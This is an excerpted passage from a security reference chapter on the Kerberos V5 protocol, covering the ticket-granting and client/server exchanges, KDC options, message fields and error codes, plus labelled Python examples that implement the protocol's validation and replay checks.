If the reply message type is KRB_AS_REP, then the client verifies that the cname and crealm fields in the cleartext portion of the reply match what it requested. The client uses its secret key to decrypt the encrypted part of the response and verifies that the nonce in the encrypted part matches the nonce it supplied in its request (to detect replays). It then stores the ticket, session key, start and expiration times, and other information for later use. The client program could then suggest remedial action, such as a password change.

The user and an attacker could cooperate to generate a KRB_AS_REP format message that decrypts properly but is not from the proper Key Distribution Center. If those credentials can be verified, then the identity of the user can be assured.


Receipt of a KRB_ERROR Message
If the reply message type is KRB_ERROR, then the client interprets it as an error and performs whatever application-specific tasks are necessary to recover.

The server can be local or registered in a remote realm. The client must already have acquired a ticket for the Ticket Granting Service using the Authentication Server exchange. The message format for the Ticket Granting Service exchange is almost identical to that for the Authentication Server exchange. Instead of the client’s secret key, the session key from the Ticket Granting Ticket or renewable ticket, or the subsession key from an Authenticator, is used.

After a renewable or Ticket Granting Ticket expires, the client must use a separate exchange to obtain valid tickets.


The KRB_TGS_REQ message includes information that authenticates the client, plus a request for credentials. In the Ticket Granting Ticket and proxy cases, the request can include one or more of the following:
- A list of network addresses
- A collection of typed authorization data to be sealed in the ticket for authorization use by the application server, or additional tickets

The Ticket Granting Service reply (KRB_TGS_REP) contains the requested credentials, encrypted in the session key from the Ticket Granting Ticket or renewable ticket, or if present, in the subsession key from the Authenticator (part of the authentication header). The KRB_ERROR message is not encrypted. The KRB_ERROR message also contains information that can be used to associate it with the message to which it replies.


Generation of KRB_TGS_REQ Message
Before sending a request to the Ticket Granting Service, the client must determine in which realm the application server is registered, using one of several ways:
- It might be known beforehand (because the realm is part of the principal identifier).
- The information can be obtained from a configuration file.

This might result in the use of a realm that has been compromised, and would result in an attacker’s ability to compromise the authentication of the application server to the client.

If the client does not already possess a Ticket Granting Ticket for the appropriate realm, then one must be obtained. The Kerberos server may return a Ticket Granting Ticket for the desired realm, or one for an intermediate realm that is closer to it. In the latter case, the client must repeat this step using a Kerberos server in the realm specified in the returned Ticket Granting Ticket. This request requires a Ticket Granting Ticket for the higher realm that must be obtained by recursively applying these directions.

... RESEARCH ... COM wants to use services in PROJECTX ... ABC ... RESEARCH ... COM for credentials ... ABC ... In turn, RESEARCH will return credentials for ABC ... ABC ... Finally he will get credentials for PROJECTX ... ABC ... Luckily for the user, this five-step process will all take place automatically. The list could be obtained through a configuration file or network service.

As in the Authentication Server exchange, the client may specify a number of options in the KRB_TGS_REQ message.

In preparing the authentication header, the client can select a subsession key under which the response from the Kerberos server will be encrypted. If the subsession key is not specified, the session key from the Ticket Granting Ticket is used.

After the message is prepared, it is sent to a Kerberos server for the destination realm.

However, there are many additional checks to be performed.
...
Usually, the accompanying ticket is for the Ticket Granting Service, and the Ticket Granting Service’s key is used. If the accompanying ticket is for an application server in the current realm, and the RENEW, VALIDATE, or PROXY options are specified in the request, and the server for which a ticket is requested is the server named in the accompanying ticket, then the Key Distribution Center uses the key of the application server to decrypt the ticket in the authentication header.

After the accompanying ticket has been decrypted, the user-supplied checksum in the Authenticator must be verified against the contents of the request. If the checksum type is not supported, the KDC_ERR_SUMTYPE_NOSUPP error is returned.

If any of the decryptions indicate failed integrity checks, the KRB_AP_ERR_BAD_INTEGRITY error is returned. The Kerberos database is queried to retrieve the record for the requested server, including the key with which the ticket is to be encrypted. This is the only case in which the response from the Key Distribution Center is for a different server than that requested by the client. If the transited field needs to be updated, but the transited type is not supported, the KDC_ERR_TRTYPE_NOSUPP error is returned.

The expiration time of the new ticket is bounded by limits including:
- The end time from the Ticket Granting Ticket. The maximum life for the requesting principal was already applied when the Ticket Granting Ticket was issued.

The FORWARDED option is honored only if the FORWARDABLE flag is set in the Ticket Granting Ticket. The resulting ticket contains the addresses specified by the client. The PROXY option is not honored on requests for additional Ticket Granting Tickets. If the requested start time indicates a time in the future, but the POSTDATED option has not been specified or the MAY-POSTDATE flag is not set in the Ticket Granting Ticket, then the error KDC_ERR_CANNOT_POSTDATE is returned. If acceptable, the ticket’s start time is set as requested, and the INVALID flag is set. However, in no case may the start time, end time, or renew-till time of a newly issued postdated ticket extend beyond the renew-till time of the Ticket Granting Ticket. If the name of the requested server is missing from the request, the name of the client in the additional ticket will be used. If the request succeeds, the session key from the additional ticket will be used to encrypt the new ticket that is issued instead of using the key of the server for which the new ticket will be used.

If the RENEW option is requested, then the Key Distribution Center will verify that the RENEWABLE flag is set in the ticket and that the renew-till time is still in the future. If the PROXY option is requested, then the Key Distribution Center will check that the PROXIABLE flag is set in the ticket.


Whenever a request is made to the Ticket Granting Server, the presented ticket(s) is checked against a hot-list of tickets that have been canceled. If a presented ticket had an authtime in the time range covered by such a cancellation, it would be rejected. Any normal ticket obtained before it was reported stolen will still be valid, but only until the normal expiration time.

The KRB_TGS_REP message is not encrypted using the client’s secret key.
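The option checks above (RENEW, VALIDATE, PROXY, FORWARDED, POSTDATED, RENEWABLE and RENEWABLE-OK, the bounds on the new ticket’s times, and the hot-list check on authtime), as an added example in Python that is not the chapter’s code. Flags and options are passed as sets of names; KDC_ERR_CANNOT_POSTDATE is the code the text names, the other codes are RFC 1510 names the text does not quote, the hot-list case uses a labelled placeholder because the text gives no code for it, and all times are constructed.

```python
"""Added example (not from the chapter): the checks a Ticket Granting Server
applies to the options of a KRB_TGS_REQ, following the rules in the text."""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import Optional

@dataclass
class TgtInfo:
    """Read from the decrypted Ticket Granting Ticket in the authentication header."""
    flags: set
    authtime: datetime
    starttime: datetime
    endtime: datetime
    renew_till: Optional[datetime] = None

@dataclass
class TgsRequest:
    """KRB_TGS_REQ fields used here; for_tgt: the request is for another TGT."""
    options: set
    till: datetime
    from_: Optional[datetime] = None
    rtime: Optional[datetime] = None
    for_tgt: bool = False

class KdcError(Exception):
    """Carries the error code the KDC would return in a KRB_ERROR."""

def process_tgs_options(tgt, req, now, server_max_life, hot_list=()):
    """Return the flags and times of the ticket to issue, or raise KdcError."""
    opts, flags = set(req.options), set(tgt.flags)
    for lo, hi in hot_list:  # presented ticket authenticated in a cancelled range
        if lo <= tgt.authtime <= hi:
            raise KdcError("HOT_LIST_REJECT")  # placeholder; the text names no code
    # KDC_ERR_BADOPTION and KRB_AP_ERR_TKT_NYV are RFC 1510 codes not named in the text.
    if "RENEW" in opts and ("RENEWABLE" not in flags or tgt.renew_till is None
                            or tgt.renew_till <= now):
        raise KdcError("KDC_ERR_BADOPTION")
    if "VALIDATE" in opts:
        if "INVALID" not in flags:
            raise KdcError("KDC_ERR_BADOPTION")
        if now < tgt.starttime:  # a ticket cannot be validated before its start time
            raise KdcError("KRB_AP_ERR_TKT_NYV")
        flags.discard("INVALID")
    if "PROXY" in opts:  # needs PROXIABLE; never honored for a new TGT
        if "PROXIABLE" not in flags or req.for_tgt:
            raise KdcError("KDC_ERR_BADOPTION")
        flags.add("PROXY")
    if "FORWARDED" in opts:  # honored only if the TGT is FORWARDABLE
        if "FORWARDABLE" not in flags:
            raise KdcError("KDC_ERR_BADOPTION")
        flags.add("FORWARDED")
    # A future start time is a postdating request: it needs the POSTDATED option and
    # a MAY-POSTDATE TGT, and the new ticket is also INVALID until validated.
    start, postdated = now, False
    if req.from_ is not None and req.from_ > now:
        if "POSTDATED" not in opts or "MAY-POSTDATE" not in flags:
            raise KdcError("KDC_ERR_CANNOT_POSTDATE")
        start, postdated = req.from_, True
        flags |= {"POSTDATED", "INVALID"}
    # End time: bounded by the requested till, the server's maximum life and the TGT's
    # end time; renewals and postdated tickets are bounded by the TGT's renew-till instead.
    tgt_bound = tgt.endtime
    if ("RENEW" in opts or postdated) and tgt.renew_till is not None:
        tgt_bound = tgt.renew_till
    end = min(req.till, tgt_bound, start + server_max_life)
    if end <= start:
        raise KdcError("KDC_ERR_NEVER_VALID")  # RFC 1510: start time later than end time
    renew_till = None
    if "RENEW" in opts:
        renew_till = tgt.renew_till  # a renewal keeps the absolute limit
    elif "RENEWABLE" in opts or ("RENEWABLE-OK" in opts and req.till > end):
        if "RENEWABLE" in flags:  # only possible when the TGT itself is renewable
            wanted = req.rtime if "RENEWABLE" in opts and req.rtime else req.till
            renew_till = min(wanted, tgt.renew_till) if tgt.renew_till else wanted
        elif "RENEWABLE" in opts:
            raise KdcError("KDC_ERR_BADOPTION")
    (flags.add if renew_till else flags.discard)("RENEWABLE")
    return {"flags": flags, "starttime": start, "endtime": end, "renew_till": renew_till}

# Constructed clock and TGT; demo() reports times as hours from NOW, or the error code.
NOW = datetime(1996, 2, 2, 9, 0, tzinfo=timezone.utc)
H = timedelta(hours=1)
SAMPLE_TGT = TgtInfo({"FORWARDABLE", "RENEWABLE", "MAY-POSTDATE"}, authtime=NOW - H,
                     starttime=NOW - H, endtime=NOW + 7 * H, renew_till=NOW + 168 * H)

def demo():
    def run(req, hot_list=()):
        try:
            r = process_tgs_options(SAMPLE_TGT, req, NOW, 8 * H, hot_list)
            return {"flags": r["flags"], "start": (r["starttime"] - NOW) / H,
                    "end": (r["endtime"] - NOW) / H}
        except KdcError as e:
            return str(e)
    return {
        "plain": run(TgsRequest(set(), till=NOW + 10 * H)),
        "proxy_without_proxiable": run(TgsRequest({"PROXY"}, till=NOW + H)),
        "postdated": run(TgsRequest({"POSTDATED"}, till=NOW + 48 * H, from_=NOW + 24 * H)),
        "future_start_no_option": run(TgsRequest(set(), till=NOW + 48 * H, from_=NOW + 24 * H)),
        "renew": run(TgsRequest({"RENEW"}, till=NOW + 10 * H)),
        "hot_listed": run(TgsRequest(set(), till=NOW + H), [(NOW - 2 * H, NOW - H / 2)]),
    }
```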


Encoding the Transited Field
If the identity of the server in the Ticket Granting Ticket that is presented to the Key Distribution Center as part of the authentication header is that of the Ticket Granting Service, but the Ticket Granting Ticket was issued from another realm, the Key Distribution Center looks up the inter-realm key shared with that realm and uses that key to decrypt the ticket.

The realm part of the client’s identity is taken from the Ticket Granting Ticket. The name of the realm that issued the Ticket Granting Ticket must then be added to the transited field of the ticket being issued. This is accomplished by reading the transited field from the Ticket Granting Ticket, adding the new realm to the set, then constructing and writing out its encoded (shorthand) form.

The Ticket Granting Service does not add the name of its own realm; that is left to the next Ticket Granting Service in the authentication path. This prevents a malicious Kerberos server from intentionally leaving out its own name.

The names of neither the local realm nor the principal’s realm are included in the transited field. Because the endpoints are not included, both local and single-hop inter-realm authentication result in an empty transited field. To decrease the length of this field, its contents are encoded. ... X.500 style realm names.
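The realm hierarchy of figure 9.3 and the transited field just described, as an added example in Python that is not code from the chapter: it builds the authentication path through the hierarchy (with an optional direct inter-realm key as a shortcut), derives the transited set by dropping both endpoints, and applies an end service’s trust policy to it. The realm names, the direct key between the two project realms, and the trusted set are constructed.

```python
"""Added example (not from the chapter): authentication paths through a realm
hierarchy like the one in figure 9.3, and the transited field they produce."""
from collections import deque

# Constructed hierarchy: each child realm shares an inter-realm key with its parent.
PARENT = {
    "RESEARCH.ABC.COM": "ABC.COM",
    "PRODUCTION.ABC.COM": "ABC.COM",
    "ACCOUNTING.ABC.COM": "ABC.COM",
    "PROJECTX.RESEARCH.ABC.COM": "RESEARCH.ABC.COM",
    "PROJECTW.PRODUCTION.ABC.COM": "PRODUCTION.ABC.COM",
    "PAYROLL.ACCOUNTING.ABC.COM": "ACCOUNTING.ABC.COM",
}
# A direct key set up between two realms that see significant traffic but are not
# adjacent in the hierarchy (constructed; pairs are unordered).
DIRECT_KEYS = {frozenset({"PROJECTX.RESEARCH.ABC.COM", "PROJECTW.PRODUCTION.ABC.COM"})}

def shared_key_graph(parent, direct_keys):
    """Adjacency map: two realms are adjacent when they share an inter-realm key."""
    graph = {}
    def link(a, b):
        graph.setdefault(a, set()).add(b)
        graph.setdefault(b, set()).add(a)
    for child, par in parent.items():
        link(child, par)
    for pair in direct_keys:
        link(*sorted(pair))
    return graph

def authentication_path(client_realm, server_realm, parent=PARENT, direct_keys=DIRECT_KEYS):
    """Shortest chain of realms, each sharing a key with the next, from client realm
    to server realm (both endpoints included). None if the realms do not communicate."""
    if client_realm == server_realm:
        return [client_realm]
    graph = shared_key_graph(parent, direct_keys)
    prev = {client_realm: None}
    queue = deque([client_realm])
    while queue:  # breadth-first search finds the fewest inter-realm hops
        realm = queue.popleft()
        for nxt in sorted(graph.get(realm, ())):
            if nxt in prev:
                continue
            prev[nxt] = realm
            if nxt == server_realm:
                path = [nxt]
                while prev[path[-1]] is not None:
                    path.append(prev[path[-1]])
                return path[::-1]
            queue.append(nxt)
    return None

def transited_realms(path):
    """Realms named in the ticket's transited field: the path without its endpoints,
    so local and single-hop authentication both yield an empty list."""
    return path[1:-1]

def end_service_accepts(transited, trusted_intermediaries):
    """The end service's policy: accept only if every transited realm is one it trusts."""
    return all(realm in trusted_intermediaries for realm in transited)

if __name__ == "__main__":
    p = authentication_path("PAYROLL.ACCOUNTING.ABC.COM", "PROJECTX.RESEARCH.ABC.COM")
    print(p, transited_realms(p))
```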



Receipt of a KRB_TGS_REP Message
After the client receives the KRB_TGS_REP, it processes it in the same manner as the KRB_AS_REP processing described earlier.

Specifications for the Authentication Server and Ticket Granting Service Exchanges
This section specifies the format of the messages used in exchange between the client and the Kerberos server.

The Key Distribution Center options indicate the flags that the client wants set on the tickets, as well as other information to modify the behavior of the Key Distribution Center. Where appropriate, the name of an option may be the same as the flag set by that option.
Table 9.4 lists the Key Distribution Center options.

Table 9.4 Key Distribution Center Options
Bit(s)  Name             Description
1       FORWARDABLE      The FORWARDABLE option indicates that the ticket to be issued is to have its forwardable flag set.
2       FORWARDED        This option indicates that this is a request for forwarding.
3       PROXIABLE        The PROXIABLE option indicates that the ticket to be issued is to have its proxiable flag set.
4       PROXY            The PROXY option indicates that this is a request for a proxy. The address(es) of the host from which the resulting ticket is to be valid are included in the addresses field of the request.
5       ALLOW-POSTDATE   It may only be set on the initial request, or if the Ticket Granting Ticket on which it is based also has its MAY-POSTDATE flag set.
6       POSTDATED        This option will only be honored if the Ticket Granting Ticket on which it is based has its MAY-POSTDATE flag set.
7       UNUSED           This option is presently unused.
8       RENEWABLE        It may only be set on the initial request, or when the Ticket Granting Ticket on which the request is based is also renewable.
9–26    RESERVED         Reserved for future use.
27      RENEWABLE-OK     If a ticket with the requested life cannot be provided, then a renewable ticket may be issued with a renew-till equal to the requested end time.
28      ENC-TKT-IN-SKEY  This option is used only by the Ticket Granting Service. It indicates that the ticket to be issued for the end server is to be encrypted in the session key from the additional Ticket Granting Ticket provided.
30      RENEW            The RENEW option indicates that the present request is for a renewal. The ticket to be renewed is passed in the padata field as part of the authentication header.
31      VALIDATE         The VALIDATE option indicates that the request is to validate a postdated ticket. A ticket cannot be validated before its start time.

The KRB_KDC_REQ message has no type of its own. Instead, its type is either KRB_AS_REQ or KRB_TGS_REQ, depending on whether the request is for an initial ticket or an additional ticket.

The message fields are as follows:

AS-REQ = KDC-REQ
TGS-REQ = KDC-REQ
KDC-REQ = {
    pvno[1]                     INTEGER,
    msg-type[2]                 INTEGER,
    padata[3]                   SEQUENCE OF PA-DATA OPTIONAL,
    req-body[4]                 KDC-REQ-BODY
}
PA-DATA = {
    padata-type[1]              INTEGER,
    padata-value[2]             BYTE STRING  -- might be encoded AP-REQ
}
padata-type  = PA-ENC-TIMESTAMP
padata-value = EncryptedData  -- PA-ENC-TS-ENC
PA-ENC-TS-ENC = {
    patimestamp[0]              KerberosTime,  -- client's time
    pausec[1]                   INTEGER OPTIONAL
}
KDC-REQ-BODY = {
    kdc-options[0]              KDCOptions,
    cname[1]                    PrincipalName OPTIONAL,  -- Used only in AS-REQ
    realm[2]                    Realm,  -- Server's realm; also client's in AS-REQ
    sname[3]                    PrincipalName OPTIONAL,
    from[4]                     KerberosTime OPTIONAL,
    till[5]                     KerberosTime,
    rtime[6]                    KerberosTime OPTIONAL,
    nonce[7]                    INTEGER,
    etype[8]                    SEQUENCE OF INTEGER,  -- EncryptionType, in preference order
    addresses[9]                HostAddresses OPTIONAL,
    enc-authorization-data[10]  EncryptedData OPTIONAL,  -- Encrypted AuthorizationData encoding
    additional-tickets[11]      SEQUENCE OF Ticket OPTIONAL
}

The fields in this message are described in Table 9.5.

Table 9.5 KRB_KDC_REQ Message Fields
Field                   Description
msg-type                Indicates the type of protocol message. Included to make the identifier more readily accessible to the application.
padata                  Contains authentication information that may be needed before credentials can be issued or decrypted. The checksum in the authenticator (which must be collision-proof) is to be computed over the KDC-REQ-BODY encoding. In most requests for initial authentication and most replies, the padata field is left out. It might be used, for example, to initially verify the identity of a client before any response is returned. It can also contain information needed to help the KDC or the client select the key needed for generating or decrypting the response, useful for supporting the use of certain “smartcards” with Kerberos.
pausec                  Contains the microseconds.
padata-type             Negative values of padata-type are reserved for unregistered use.
req-body                Delimits the extent of the remaining fields.
kdc-options             Appears in the KRB_AS_REQ and KRB_TGS_REQ requests to the Key Distribution Center.
cname and sname         Same as those described for the ticket. If absent, the name of the server is taken from the name of the client in the ticket passed as additional-tickets.
enc-authorization-data  Encrypted under the sub-session key if present in the Authenticator, or alternatively under the session key in the Ticket Granting Ticket, both from the padata field in the KRB_AP_REQ.
realm                   In the Authentication Server exchange, this is also the realm part of the client’s principal identifier.
till                    Contains the expiration date requested by the client in a ticket request.
nonce                   Part of the Key Distribution Center request and response. If the same number is included in the encrypted response from the Key Distribution Center, it provides evidence that the response is fresh and has not been replayed by an attacker. Ideally it should be generated randomly, but if the correct time is known, it may suffice.
etype                   Specifies the desired encryption algorithm to be used in the response.
addresses               Usually includes the addresses for the client’s host. The contents of this field are usually copied by the Key Distribution Center into the caddr field of the resulting ticket.
additional-tickets      If the ENC-TKT-IN-SKEY option has been specified, then the session key from the additional ticket will be used in place of the server’s key to encrypt the new ticket.

The optional fields are included only if necessary to perform the operation specified in the kdcoptions field
...
The KRB_TGS_REQ message contains these fields, as does the authentication
header (KRB_AP_REQ) passed in the padata field
...
The message type is KRB_AS_REP or KRB_TGS_REP
...
For
KRB_AS_REP, the ciphertext is encrypted in the client’s secret key, and the client’s key
version number is included in the key version number for the encrypted data
...
In that case,
no version number is present in the EncryptedData sequence
...
Table 9.6 describes the fields in this message
...
Table 9.6
KRB_KDC_REP Message Fields
Field

Description

pvno and msg-type

Described earlier
...


padata

Described in detail earlier
...


ticket

The newly issued ticket
...


key

Same as described for the ticket
...
Depending on what information is
available, this might be the last time that a request for a Ticket
Granting Ticket was made, or the last time that a request based on a
Ticket Granting Ticket was successful
...
Some implementations may display
this information to the user to aid in discovering unauthorized use of
one’s identity
...


nonce

Described earlier
...


flags, authtime,
starttime, endtime,
renew-till, and caddr

All duplicates of those found in the encrypted portion of the attached
ticket
...
The client must already have acquired credentials for the
server using the Authentication Server or Ticket Granting Server exchange
...


The KRB_AP_REQ Message
The KRB_AP_REQ contains authentication information that should be part of the first
message in an authenticated transaction
...
The ticket by itself is insufficient to authenticate a client,
because tickets are passed across the network in cleartext
...
Tickets can be copied from one
message and replayed in another without any cryptographic skill
...
The KRB_AP_REQ message is referred to elsewhere
as the “authentication header
...
The client can reuse any tickets it holds until they expire
...

Authenticators may not be reused and are rejected if replayed to a server
...
In such
cases, a new Authenticator must be generated for each retry
...

The client can indicate a requirement of mutual authentication or the use of a session-key
based ticket by setting the appropriate flag(s) in the ap-options field of the message
...


Receipt of a KRB_AP_REQ Message
Authentication is based on the server’s current time of day (clocks must be loosely synchronized), the Authenticator, and the ticket
...
This message can be encapsulated in the application
protocol if its “raw” form is not acceptable to the protocol
...
If the message type is
not KRB_AP_REQ, the server returns the KRB_AP_ERR_MSG_TYPE error
...
If the USE-SESSION-KEY flag is set in the
ap-options field, it indicates to the server that the ticket is encrypted in the session key from
the server’s Ticket Granting Ticket rather than its secret key
...
The KRB_AP_ERR_NOKEY error code is returned if
the server doesn’t have the proper key to decipher the ticket
...

If the decryption routines detect a modification of the ticket, the
KRB_AP_ERR_BAD_INTEGRITY error is returned
...

The authenticator is decrypted using the session key extracted from the decrypted ticket
...
The name and realm of the client from the ticket are compared against the same
fields in the Authenticator
...

They might not match, for example, if the wrong session key was used to encrypt the Authenticator
...
If no match is found or the server insists on
ticket addresses when none are present in the ticket, the KRB_AP_ERR_BADADDR error is
returned
...
If the server name along
with the client name, time and microsecond fields from the Authenticator match any recently
seen such tuples, the KRB_AP_ERR_REPEAT error is returned
...

Other client principals communicating with the same server principal should not have their
Authenticators rejected if the time and microsecond fields happen to match some other client’s
authenticator
...
If a server loses track of any authenticator presented
within the allowable clock skew, it will reject all requests until the clock skew interval has
passed
...
If this is not done, an attacker could conceivably record the ticket and authenticator sent over the network to a server
...
If a sequence number is provided in the authenticator, the server saves it for later use in processing KRB_SAFE and/or KRB_PRIV messages
...

The server computes the age of the ticket: server time minus the start time inside the Ticket
...
Otherwise, if the current time is later than the end time by more than the allowable clock skew, the
KRB_AP_ERR_TKT_EXPIRED error is returned
...
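What the server does on receipt of a KRB_AP_REQ, worked through in Python as an added example (not code from the book or from any Kerberos implementation). It keeps the order of checks given above and the error codes named there; KRB_AP_ERR_BADMATCH (client name in the ticket and in the Authenticator differ) and KRB_AP_ERR_TKT_NYV (ticket not yet valid) are the RFC 1510 names for two checks whose codes the text does not give, and are assumptions here. A JSON body with a keyed HMAC tag stands in for Kerberos encryption, so a wrong key or a modified field shows up as a failed tag; the ticket, the authenticators, the addresses and the 300-second skew are constructed for the example.

```python
import hashlib, hmac, json, os
from typing import Any, Dict, Optional, Tuple

CLOCK_SKEW = 300  # allowable clock skew in seconds (assumed value)


def _tag(key: bytes, body: str) -> str:
    return hmac.new(key, body.encode(), hashlib.sha256).hexdigest()


def seal(key: bytes, fields: Dict[str, Any]) -> Dict[str, str]:
    # Stand-in for Kerberos EncryptedData: a JSON body plus a keyed tag. It hides
    # nothing; it only lets the receiver detect a wrong key or a modified field.
    body = json.dumps(fields, sort_keys=True)
    return {"body": body, "tag": _tag(key, body)}


def open_sealed(key: bytes, enc: Dict[str, str]) -> Optional[Dict[str, Any]]:
    if not hmac.compare_digest(_tag(key, enc["body"]), enc["tag"]):
        return None
    return json.loads(enc["body"])


class ApServer:
    """Application server side of KRB_AP_REQ processing, in the order the text gives."""

    def __init__(self, sname: str, keys: Dict[int, bytes], now: int,
                 require_addr: bool = False, tgt_session_key: Optional[bytes] = None):
        self.sname, self.keys, self.now, self.require_addr = sname, keys, now, require_addr
        self.tgt_session_key = tgt_session_key                 # used when USE-SESSION-KEY is set
        self.seen: Dict[Tuple[str, str, int, int], int] = {}   # replay cache: (sname, cname, ctime, cusec)
        self.peer_seq: Dict[str, int] = {}                      # seq-numbers saved for KRB_SAFE / KRB_PRIV

    def receive(self, msg: Dict[str, Any], sender_addr: str) -> Tuple[Optional[str], Optional[Dict]]:
        """Return (error_code, None) on failure or (None, context) on success."""
        if msg.get("msg-type") != "KRB_AP_REQ":
            return "KRB_AP_ERR_MSG_TYPE", None
        opts, tkt_enc = msg.get("ap-options", []), msg["ticket"]["enc-part"]
        key = self.tgt_session_key if "USE-SESSION-KEY" in opts else self.keys.get(tkt_enc["kvno"])
        if key is None:
            return "KRB_AP_ERR_NOKEY", None
        tkt = open_sealed(key, tkt_enc)
        if tkt is None:
            return "KRB_AP_ERR_BAD_INTEGRITY", None
        session_key = bytes.fromhex(tkt["key"])
        auth = open_sealed(session_key, msg["authenticator"])
        if auth is None:                                        # tampered, or built under the wrong session key
            return "KRB_AP_ERR_BAD_INTEGRITY", None
        if (auth["cname"], auth["crealm"]) != (tkt["cname"], tkt["crealm"]):
            return "KRB_AP_ERR_BADMATCH", None                  # RFC 1510 code (assumed; not named in the text)
        caddr = tkt.get("caddr", [])
        if (caddr and sender_addr not in caddr) or (self.require_addr and not caddr):
            return "KRB_AP_ERR_BADADDR", None
        if abs(auth["ctime"] - self.now) > CLOCK_SKEW:
            return "KRB_AP_ERR_SKEW", None
        # Entries older than the skew window can no longer be replayed and are dropped.
        self.seen = {k: t for k, t in self.seen.items() if self.now - t <= CLOCK_SKEW}
        tup = (self.sname, auth["cname"], auth["ctime"], auth["cusec"])
        if tup in self.seen:                                    # cname is in the tuple, so another client
            return "KRB_AP_ERR_REPEAT", None                    # with the same time/usec is not rejected
        self.seen[tup] = self.now
        if self.now < tkt.get("starttime", self.now) - CLOCK_SKEW:
            return "KRB_AP_ERR_TKT_NYV", None                   # RFC 1510 "not yet valid" code (assumed)
        if self.now > tkt["endtime"] + CLOCK_SKEW:
            return "KRB_AP_ERR_TKT_EXPIRED", None
        if "seq-number" in auth:
            self.peer_seq[auth["cname"]] = auth["seq-number"]
        return None, {"client": auth["cname"], "session_key": session_key,
                      "subkey": auth.get("subkey"), "mutual": "MUTUAL-REQUIRED" in opts}


def demo() -> Dict[str, Optional[str]]:
    """Constructed ticket and authenticators that exercise the checks above."""
    now, host_key, session_key = 1_000_000, os.urandom(16), os.urandom(16)
    ticket = {"sname": "host/app.example.com", "enc-part": dict(kvno=2, **seal(host_key, {
        "cname": "alice", "crealm": "EXAMPLE.COM", "key": session_key.hex(),
        "caddr": ["10.0.0.5"], "starttime": now - 60, "endtime": now + 3600}))}

    def ap_req(cusec: int, ctime: int = now + 5) -> Dict[str, Any]:
        auth = {"cname": "alice", "crealm": "EXAMPLE.COM", "ctime": ctime, "cusec": cusec, "seq-number": 17}
        return {"msg-type": "KRB_AP_REQ", "ap-options": ["MUTUAL-REQUIRED"],
                "ticket": ticket, "authenticator": seal(session_key, auth)}

    tampered, old_kvno = ap_req(2), ap_req(3)
    tampered["ticket"] = {**ticket, "enc-part": {**ticket["enc-part"],
                          "body": ticket["enc-part"]["body"].replace("alice", "mallory")}}
    old_kvno["ticket"] = {**ticket, "enc-part": {**ticket["enc-part"], "kvno": 1}}
    srv = ApServer("host/app.example.com", {2: host_key}, now)
    return {
        "fresh":         srv.receive(ap_req(1), "10.0.0.5")[0],             # None: accepted
        "replayed":      srv.receive(ap_req(1), "10.0.0.5")[0],             # KRB_AP_ERR_REPEAT
        "wrong_address": srv.receive(ap_req(4), "10.0.0.9")[0],             # KRB_AP_ERR_BADADDR
        "tampered":      srv.receive(tampered, "10.0.0.5")[0],              # KRB_AP_ERR_BAD_INTEGRITY
        "unknown_kvno":  srv.receive(old_kvno, "10.0.0.5")[0],              # KRB_AP_ERR_NOKEY
        "stale_auth":    srv.receive(ap_req(5, now - 900), "10.0.0.5")[0],  # KRB_AP_ERR_SKEW
    }
```

The replay cache is keyed on (server, client, ctime, cusec), which is why two different clients whose clocks happen to produce the same time and microsecond values are not rejected as replays of each other, and entries are kept only for the skew window, since anything older fails the clock-skew test anyway.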


Generation of a KRB_AP_REP Message
Typically, a client’s request includes both the authentication information and its initial request
in the same message
...
If mutual
authentication is being performed, however, the KRB_AP_REQ message will have MUTUAL-REQUIRED set in its ap-options field
...

As with the error message, this message can be encapsulated in the application protocol if its
raw form is unacceptable to the application’s protocol
...
If a sequence number is to be included, it should be chosen randomly, as
described earlier for the Authenticator
...
The KRB_AP_REP message is encrypted in the session key
extracted from the ticket
...
If they match, the
client is assured that the server is genuine
...


Using the Encryption Key
After the KRB_AP_REQ/KRB_AP_REP exchange has occurred, the client and server share
an encryption key that can be used by the application
...
Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

In some cases, the use of this session key is implicit in the protocol
...

With both the one-way and mutual authentication exchanges, the peers should take care not to
send sensitive information to each other without proper assurances
...
If an application protocol requires privacy of its messages, it can use the KRB_PRIV message
...


Client/Server (CS) Message Specifications
This section specifies the format of the messages used for the authentication of the client to the
application server
...
The KRB_AP_REQ message is often referred to as the authentication header
...
Table 9.7 describes the fields in this message
...
Table 9.7
KRB_AP_REQ Message Fields
Field

Description

pvno and msg-type

Described earlier
...


ap-options

Appears in the application request (KRB_AP_REQ) and affects the
way the request is processed
...
Table 9.7, Continued
KRB_AP_REQ Message Fields
Field

Description
The USE-SESSION-KEY option indicates that the ticket the client
is presenting to a server is encrypted in the session key from the
server’s Ticket Granting Ticket
...

The MUTUAL-REQUIRED option tells the server that the client
requires mutual authentication, and that it must respond with a
KRB_AP_REP message
...


authenticator

Contains the authenticator, which includes the client’s choice of a
subkey
...
The message is sent in response to an application request
(KRB_AP_REQ) in which the mutual authentication option has been selected in the ap-options field
...
Table 9.8 describes the fields in this message
...
Table 9.8
KRB_AP_REP Message Fields
Field

Description

pvno and msg-type

Described earlier
...


enc-part

Described earlier
...


cusec

Contains the microsecond part of the client’s timestamp
...
Unless an application specifies otherwise, if this
field is left out, the subsession key from the authenticator is used
...


Error Message Reply
If an error occurs while processing the application request, the KRB_ERROR message is sent
in response
...
If the Authenticator was
decipherable, the ctime and cusec fields contain the values from it
...
It achieves this by including a keyed, collision-proof
checksum of the user data and some control information
...
Kerberos usually uses the last key negotiated via subkeys, or the session key if
no negotiation has occurred
...
The checksum algorithm should
be some sort of keyed one-way function such as the RSA-MD5-DES, or the DES-MAC,
generated using the subsession key if present, or otherwise the session key
...
Unkeyed or non-collision-proof
checksums are not suitable for this use
...
The control
information for the KRB_SAFE message includes a timestamp and a sequence number
...

Sequence numbers are useful when all messages sent will be received by one’s peer
...



If the application protocol is expected to tolerate lost messages without them being resent, the
use of the timestamp is the appropriate replay detection mechanism
...

After computing the checksum, the client then transmits the information and checksum to the
recipient
...
If any error
occurs, an error code is reported for use by the application
...
A mismatch generates a
KRB_AP_ERR_BADVERSION or KRB_AP_ERR_MSG_TYPE error
...
The recipient verifies that the
operating system’s report of the sender’s address matches the sender’s address in the message
...
A failed match for
either case generates a KRB_AP_ERR_BADADDR error
...

If timestamp and usec are expected and not present, or they are present but not current, the
KRB_AP_ERR_SKEW error is generated
...
If an incorrect sequence number is included, or
a sequence number is expected but not present, the KRB_AP_ERR_BADORDER error is
generated
...

Finally, the checksum is computed over the data and control information, and if it doesn’t
match the received checksum, a KRB_AP_ERR_MODIFIED error is generated
...
